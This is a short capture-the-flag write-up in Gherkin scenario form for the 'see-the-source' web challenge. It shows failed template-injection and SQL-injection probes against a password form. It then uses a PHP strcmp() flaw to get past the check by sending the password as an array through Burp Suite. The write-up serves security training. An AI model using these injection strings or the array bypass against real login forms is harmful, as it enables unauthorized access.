## Version 2.0
## language: en

Feature: see-the-source -web -backdoor
  Site:
    backdoor.sdslabs.co
  Category:
    Web
  User:
    alejandrohg7
  Goal:
    Get the hidden flag in the password form using the source code

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Ubuntu          | 18.04.1     |
    | Firefox         | 69.0        |
    | Burp Suite      | 2.1.02      |
  Machine information:
    Given I am accessing the web-page using the browser
    And I access to the challenge page

  Scenario: Fail: password form injection using python syntax
    Given there is a password form in the challenge page
    When I try a sample injection "{{1+1}}" in the password form
    Then there is no result
    Then I can not get the flag

  Scenario: Fail: password form SQL injection
    Given there is a password form in the challenge page
    When I try a sample injection "' OR 1=1 --" in the password form
    Then there is no result
    Then I can not get the flag

  Scenario: Success: request with Burp Suite
    When I see the source code of the challenge page
    Then I can see the code
    """
    <?php
    include("flag.php");
    $error = 0;
    if(isset($_POST['password']))
    {  $password = $_POST['password'];
    if(strcmp($password, $actual_password)==0)
    {
      echo "You have successfully authenticated!<br>";
      echo "Flag : ".$flag;
      die;
    }
      else
      $error = 1;
    }
    ?>
    """
    And I can see the "strcmp()" PHP function that evaluates the password field
    And I research for "strcmp()" PHP function vulnerabilities
    And I find it could be bypassed using an array as input
    And I use Burp to intercept the password field in the "POST" request
    """
    password=tttttttttttttttttttttttttttt
    """
    And I modify the password field to send an array
    """
    password[]=tttttttttttttttttttttttttttt
    """
    And I get the flag [evidence](img.png)
